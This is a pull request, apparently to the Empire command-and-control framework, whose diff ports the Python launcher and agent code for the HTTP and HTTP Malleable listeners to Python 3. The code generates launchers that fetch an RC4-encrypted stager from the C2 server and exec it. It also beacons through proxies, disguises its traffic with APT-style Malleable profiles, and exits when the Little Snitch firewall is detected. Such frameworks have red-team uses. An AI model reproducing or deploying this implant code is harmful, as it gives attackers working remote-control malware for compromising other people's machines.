### PR TITLE
Make HTTP malleable Python launcher work

### DIFF
--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@@ -107,6 +107,8 @@ def decode_routing_packet(data):
     """
     # returns {sessionID : (language, meta, additional, [encData]), ...}
     packets = parse_routing_packet(stagingKey, data)
+    if packets is None:
+        return
     for agentID, packet in packets.items():
         if agentID == sessionID:
             (language, meta, additional, encData) = packet

--- a/data/agent/stagers/common/rc4.py
+++ b/data/agent/stagers/common/rc4.py
@@ -115,11 +115,11 @@ def parse_routing_packet(stagingKey, data):
             return results
 
         else:
-            print("[*] parse_agent_data() data length incorrect: %s" % (len(data)))
+            # print("[*] parse_agent_data() data length incorrect: %s" % (len(data)))
             return None
 
     else:
-        print("[*] parse_agent_data() data is None")
+        # print("[*] parse_agent_data() data is None")
         return None
 
 

--- a/data/agent/stagers/http.py
+++ b/data/agent/stagers/http.py
@@ -13,7 +13,7 @@ This file is a Jinja2 template.
 
 import random
 import string
-import urllib.request as urllib
+import urllib.request
 
 {% include 'common/rc4.py' %}
 {% include 'common/aes.py' %}
@@ -22,7 +22,7 @@ import urllib.request as urllib
 
 def post_message(uri, data):
     global headers
-    return (urllib.urlopen(urllib.Request(uri, data, headers))).read()
+    return (urllib.request.urlopen(urllib.request.Request(uri, data, headers))).read()
 
 # generate a randomized sessionID
 sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))

--- a/lib/common/malleable/transaction.py
+++ b/lib/common/malleable/transaction.py
@@ -391,9 +391,13 @@ class MalleableRequest(MalleableObject):
         """Store the data according to the specified terminator.
 
         Args:
-            data (str): The data to be stored.
+            data (str): The data to be stored, has to be `str`
             terminator (Terminator): The terminator specifying where to store the data.
         """
+        try:
+            data = data.decode()
+        except AttributeError:
+            pass
         if terminator.type == Terminator.HEADER: self.header(terminator.arg, data)
         elif terminator.type == Terminator.PARAMETER: self.parameter(terminator.arg, data)
         elif terminator.type == Terminator.URIAPPEND: self.extra = data

--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -490,7 +490,7 @@ class Listener(object):
                     profile = listenerOptions['DefaultProfile']['Value']
                     userAgent = profile.split('|')[1]
                 
-                launcherBase += "import urllib.request as urllib;\n"
+                launcherBase += "import urllib.request;\n"
                 launcherBase += "UA='%s';" % (userAgent)
                 launcherBase += "server='%s';t='%s';" % (host, stage0)
                 
@@ -500,7 +500,7 @@ class Listener(object):
 
                 b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
                 
-                launcherBase += "req=urllib.Request(server+t);\n"
+                launcherBase += "req=urllib.request.Request(server+t);\n"
 
                 # Add custom headers if any
                 if customHeaders != []:
@@ -512,39 +512,39 @@ class Listener(object):
 
                 if proxy.lower() != "none":
                     if proxy.lower() == "default":
-                        launcherBase += "proxy = urllib.ProxyHandler();\n"
+                        launcherBase += "proxy = urllib.request.ProxyHandler();\n"
                     else:
                         proto = proxy.split(':')[0]
-                        launcherBase += "proxy = urllib.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
+                        launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
 
                     if proxyCreds != "none":
                         if proxyCreds == "default":
-                            launcherBase += "o = urllib.build_opener(proxy);\n"
+                            launcherBase += "o = urllib.request.build_opener(proxy);\n"
 
                             # add the RC4 packet to a cookie
                             launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
                             b64RoutingPacket)
                         else:
-                            launcherBase += "proxy_auth_handler = urllib.ProxyBasicAuthHandler();\n"
+                            launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
                             username = proxyCreds.split(':')[0]
                             password = proxyCreds.split(':')[1]
                             launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
-                            launcherBase += "o = urllib.build_opener(proxy, proxy_auth_handler);\n"
+                            launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
 
                             # add the RC4 packet to a cookie
                             launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
                             b64RoutingPacket)
                     else:
-                        launcherBase += "o = urllib.build_opener(proxy);\n"
+                        launcherBase += "o = urllib.request.build_opener(proxy);\n"
                 else:
-                    launcherBase += "o = urllib.build_opener();\n"
+                    launcherBase += "o = urllib.request.build_opener();\n"
                 
                 # install proxy and creds globally, so they can be used with urlopen.
-                launcherBase += "urllib.install_opener(o);\n"
+                launcherBase += "urllib.request.install_opener(o);\n"
                 
                 # download the stager and extract the IV
                 
-                launcherBase += "a=urllib.urlopen(req).read();\n"
+                launcherBase += "a=urllib.request.urlopen(req).read();\n"
                 launcherBase += "IV=a[0:4];"
                 launcherBase += "data=a[4:];"
                 launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
@@ -937,10 +937,10 @@ def send_message(packets=None):
     requestUri = server + taskURI
     
     try:
-        data = (urllib.urlopen(urllib.Request(requestUri, data, headers))).read()
+        data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
         return ('200', data)
 
-    except urllib.HTTPError as HTTPError:
+    except urllib.request.HTTPError as HTTPError:
         # if the server is reached, but returns an error (like 404)
         missedCheckins = missedCheckins + 1
         #if signaled for restaging, exit.
@@ -949,7 +949,7 @@ def send_message(packets=None):
 
         return (HTTPError.code, '')
 
-    except urllib.URLError as URLerror:
+    except urllib.request.URLError as URLerror:
         # if the server cannot be reached
         missedCheckins = missedCheckins + 1
         return (URLerror.reason, '')

--- a/lib/listeners/http_malleable.py
+++ b/lib/listeners/http_malleable.py
@@ -497,7 +497,7 @@ class Listener(object):
 
                 # ==== HANDLE IMPORTS ====
                 launcherBase = 'import sys,base64\n'
-                launcherBase += 'import urllib.request as urllib'
+                launcherBase += 'import urllib.request as urllib\n'
 
                 # ==== HANDLE SSL ====
                 if profile.stager.client.scheme == "https":
@@ -510,7 +510,7 @@ class Listener(object):
                     launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
                     launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
                     launcherBase += "out, err = ps.communicate()\n"
-                    launcherBase += "if re.search('Little Snitch', out):sys.exit()\n"
+                    launcherBase += "if re.search('Little Snitch', out.decode()):sys.exit()\n"
 
                 launcherBase += "server='%s'\n" % (host)
 
@@ -544,7 +544,7 @@ class Listener(object):
 
                 # ==== BUILD REQUEST ====
                 launcherBase += "vreq=type('vreq',(urllib.Request,object),{'get_method':lambda self:self.verb if (hasattr(self,'verb') and self.verb) else urllib.Request.get_method(self)})\n"
-                launcherBase += "req=vreq('%s', '%s')\n" % (profile.stager.client.url, profile.stager.client.body)
+                launcherBase += "req=vreq('%s', %s)\n" % (profile.stager.client.url, profile.stager.client.body)
                 launcherBase += "req.verb='"+profile.stager.client.verb+"'\n"
 
                 # ==== ADD HEADERS ====
@@ -582,7 +582,6 @@ class Listener(object):
                 launcherBase += "    j=(j+S[i])%256\n"
                 launcherBase += "    S[i],S[j]=S[j],S[i]\n"
                 launcherBase += "    out.append(chr(char^S[(S[i]+S[j])%256]))\n"
-                launcherBase += "exec(''.join(out))"
 
                 # ==== EXECUTE STAGER ====
                 launcherBase += "exec(''.join(out))"
@@ -1024,7 +1023,7 @@ class Listener(object):
                 sendMessage += "\n".join(["        " + _ for _ in profile.post.client.output.generate_python("routingPacket").split("\n")]) + "\n"
 
                 # ==== CHOOSE URI ====
-                sendMessage += "        taskUri = random.sample("+ profile.post.client.uris +", 1)[0]\n"
+                sendMessage += "        taskUri = random.sample("+ str(profile.post.client.uris) +", 1)[0]\n"
                 sendMessage += "        requestUri = server + taskUri\n"
 
                 # ==== ADD PARAMETERS ====
@@ -1044,6 +1043,7 @@ class Listener(object):
                     sendMessage += "        body = routingPacket\n"
                 else:
                     sendMessage += "        body = '"+profile.post.client.body+"'\n"
+                sendMessage += "        try:\n            body=body.encode()\n        except AttributeError:\n            pass\n"
 
                 # ==== BUILD REQUEST ====
                 sendMessage += "        req = vreq(requestUri, body)\n"
@@ -1063,7 +1063,7 @@ class Listener(object):
                 sendMessage += "\n".join(["        " + _ for _ in profile.get.client.metadata.generate_python("routingPacket").split("\n")]) + "\n"
 
                 # ==== CHOOSE URI ====
-                sendMessage += "        taskUri = random.sample("+ profile.get.client.uris +", 1)[0]\n"
+                sendMessage += "        taskUri = random.sample("+ str(profile.get.client.uris) +", 1)[0]\n"
                 sendMessage += "        requestUri = server + taskUri\n"
 
                 # ==== ADD PARAMETERS ====

--- a/lib/listeners/http_malleable.py
+++ b/lib/listeners/http_malleable.py
@@ -1109,7 +1109,8 @@ class Listener(object):
 
                 # ==== DECODE RESPONSE ====
                 sendMessage += "\n".join(["        " + _ for _ in profile.get.server.output.generate_python_r("data").split("\n")]) + "\n"
-
+                # before return we encode to bytes, since in some transformations "join" produces str
+                sendMessage += "        if isinstance(data,str): data = data.encode('latin-1')\n"
                 sendMessage += "        return ('200', data)\n"
 
                 # ==== HANDLE ERROR ====

--- a/lib/listeners/http_malleable.py
+++ b/lib/listeners/http_malleable.py
@@ -497,7 +497,7 @@ class Listener(object):
 
                 # ==== HANDLE IMPORTS ====
                 launcherBase = 'import sys,base64\n'
-                launcherBase += 'import urllib.request as urllib\n'
+                launcherBase += 'import urllib.request,urllib.parse\n'
 
                 # ==== HANDLE SSL ====
                 if profile.stager.client.scheme == "https":
@@ -517,25 +517,25 @@ class Listener(object):
                 # ==== CONFIGURE PROXY ====
                 if proxy and proxy.lower() != 'none':
                     if proxy.lower() == 'default':
-                        launcherBase += "proxy = urllib.ProxyHandler()\n"
+                        launcherBase += "proxy = urllib.request.ProxyHandler()\n"
                     else:
                         proto = proxy.split(':')[0]
-                        launcherBase += "proxy = urllib.ProxyHandler({'"+proto+"':'"+proxy+"'})\n"
+                        launcherBase += "proxy = urllib.request.ProxyHandler({'"+proto+"':'"+proxy+"'})\n"
                     if proxyCreds and proxyCreds != 'none':
                         if proxyCreds == 'default':
-                            launcherBase += "o = urllib.build_opener(proxy)\n"
+                            launcherBase += "o = urllib.request.build_opener(proxy)\n"
                         else:
-                            launcherBase += "proxy_auth_handler = urllib.ProxyBasicAuthHandler()\n"
+                            launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler()\n"
                             username = proxyCreds.split(':')[0]
                             password = proxyCreds.split(':')[1]
                             launcherBase += "proxy_auth_handler.add_password(None,'"+proxy+"','"+username+"','"+password+"')\n"
-                            launcherBase += "o = urllib.build_opener(proxy, proxy_auth_handler)\n"
+                            launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler)\n"
                     else:
-                        launcherBase += "o = urllib.build_opener(proxy)\n"
+                        launcherBase += "o = urllib.request.build_opener(proxy)\n"
                 else:
-                    launcherBase += "o = urllib.build_opener()\n"
+                    launcherBase += "o = urllib.request.build_opener()\n"
                 # install proxy and creds globaly, so they can be used with urlopen.
-                launcherBase += "urllib.install_opener(o)\n"
+                launcherBase += "urllib.request.install_opener(o)\n"
 
                 # ==== BUILD AND STORE METADATA ====
                 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON', meta='STAGE0', additional='None', encData='')
@@ -543,7 +543,7 @@ class Listener(object):
                 profile.stager.client.store(routingPacketTransformed, profile.stager.client.metadata.terminator)
 
                 # ==== BUILD REQUEST ====
-                launcherBase += "vreq=type('vreq',(urllib.Request,object),{'get_method':lambda self:self.verb if (hasattr(self,'verb') and self.verb) else urllib.Request.get_method(self)})\n"
+                launcherBase += "vreq=type('vreq',(urllib.request.Request,object),{'get_method':lambda self:self.verb if (hasattr(self,'verb') and self.verb) else urllib.request.Request.get_method(self)})\n"
                 launcherBase += "req=vreq('%s', %s)\n" % (profile.stager.client.url, profile.stager.client.body)
                 launcherBase += "req.verb='"+profile.stager.client.verb+"'\n"
 
@@ -552,7 +552,7 @@ class Listener(object):
                     launcherBase += "req.add_header('%s','%s')\n" % (header, value)
 
                 # ==== SEND REQUEST ====
-                launcherBase += "res=urllib.urlopen(req)\n"
+                launcherBase += "res=urllib.request.urlopen(req)\n"
 
                 # ==== INTERPRET RESPONSE ====
                 if profile.stager.server.output.terminator.type == malleable.Terminator.HEADER:
@@ -566,7 +566,7 @@ class Listener(object):
                 launcherBase += profile.stager.server.output.generate_python_r("a")
 
                 # ==== EXTRACT IV AND STAGER ====
-                launcherBase += "a=urllib.urlopen(req).read();\n"
+                launcherBase += "a=urllib.request.urlopen(req).read();\n"
                 launcherBase += "IV=a[0:4];"
                 launcherBase += "data=a[4:];"
                 launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
@@ -1011,13 +1011,13 @@ class Listener(object):
                 sendMessage += "    global headers\n"
                 sendMessage += "    global taskURIs\n"
 
-                sendMessage += "    vreq = type('vreq', (urllib.Request, object), {'get_method':lambda self:self.verb if (hasattr(self, 'verb') and self.verb) else urllib.Request.get_method(self)})\n"
+                sendMessage += "    vreq = type('vreq', (urllib.request.Request, object), {'get_method':lambda self:self.verb if (hasattr(self, 'verb') and self.verb) else urllib.request.Request.get_method(self)})\n"
 
                 # ==== BUILD POST ====
                 sendMessage += "    if packets:\n"
 
                 # ==== BUILD ROUTING PACKET ====
-                sendMessage += "        data = ''.join(packets)\n"
+                sendMessage += "        data = packets.decode('latin-1')\n"
                 sendMessage += "        encData = aes_encrypt_then_hmac(key, data)\n"
                 sendMessage += "        routingPacket = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)\n"
                 sendMessage += "\n".join(["        " + _ for _ in profile.post.client.output.generate_python("routingPacket").split("\n")]) + "\n"
@@ -1033,7 +1033,7 @@ class Listener(object):
                 if profile.post.client.output.terminator.type == malleable.Terminator.PARAMETER:
                     sendMessage += "        parameters['"+profile.post.client.output.terminator.arg+"'] = routingPacket\n"
                 sendMessage += "        if parameters:\n"
-                sendMessage += "            requestUri += '?' + urllib.urlencode(parameters)\n"
+                sendMessage += "            requestUri += '?' + urllib.parse.urlencode(parameters)\n"
 
                 if profile.post.client.output.terminator.type == malleable.Terminator.URIAPPEND:
                     sendMessage += "        requestUri += routingPacket\n"
@@ -1073,7 +1073,7 @@ class Listener(object):
                 if profile.get.client.metadata.terminator.type == malleable.Terminator.PARAMETER:
                     sendMessage += "        parameters['"+profile.get.client.metadata.terminator.arg+"'] = routingPacket\n"
                 sendMessage += "        if parameters:\n"
-                sendMessage += "            requestUri += '?' + urllib.urlencode(parameters)\n"
+                sendMessage += "            requestUri += '?' + urllib.parse.urlencode(parameters)\n"
 
                 if profile.get.client.metadata.terminator.type == malleable.Terminator.URIAPPEND:
                     sendMessage += "        requestUri += routingPacket\n"
@@ -1083,6 +1083,7 @@ class Listener(object):
                     sendMessage += "        body = routingPacket\n"
                 else:
                     sendMessage += "        body = '"+profile.get.client.body+"'\n"
+                sendMessage += "        try:\n            body=body.encode()\n        except AttributeError:\n            pass\n"
 
                 # ==== BUILD REQUEST ====
                 sendMessage += "        req = vreq(requestUri, body)\n"
@@ -1096,7 +1097,7 @@ class Listener(object):
 
                 # ==== SEND REQUEST ====
                 sendMessage += "    try:\n"
-                sendMessage += "        res = urllib.urlopen(req)\n"
+                sendMessage += "        res = urllib.request.urlopen(req)\n"
 
                 # ==== EXTRACT RESPONSE ====
                 if profile.get.server.output.terminator.type == malleable.Terminator.HEADER:
@@ -1112,12 +1113,12 @@ class Listener(object):
                 sendMessage += "        return ('200', data)\n"
 
                 # ==== HANDLE ERROR ====
-                sendMessage += "    except urllib.HTTPError as HTTPError:\n"
+                sendMessage += "    except urllib.request.HTTPError as HTTPError:\n"
                 sendMessage += "        missedCheckins += 1\n"
                 sendMessage += "        if HTTPError.code == 401:\n"
                 sendMessage += "            sys.exit(0)\n"
                 sendMessage += "        return (HTTPError.code, '')\n"
-                sendMessage += "    except urllib.URLError as URLError:\n"
+                sendMessage += "    except urllib.request.URLError as URLError:\n"
                 sendMessage += "        missedCheckins += 1\n"
                 sendMessage += "        return (URLError.reason, '')\n"
 


### PR DESCRIPTION
In this PR I fixed various issues with Python launcher for HTTP Malleable listener. They were mostly related to Python2 legacy syntax:

- change `urllib` imports to Python3 way (separate `urllib.request` and `urllib.parse`). This one had to be done in both HTTP malleable listener and in HTTP listener, because malleable acutally inherits from HTTP
- fix encoding issues on bytes-str transformations
- fix minor syntax errors (like lack of newlines or unnecessary quotes)

After changes I tested Python launcher for:
- HTTP listener
- HTTP Malleable with [havex.profile](https://github.com/BC-SECURITY/Malleable-C2-Profiles/blob/master/APT/havex.profile)
- HTTP Malleable with [powruner.profile](https://github.com/BC-SECURITY/Malleable-C2-Profiles/blob/master/APT/powruner.profile)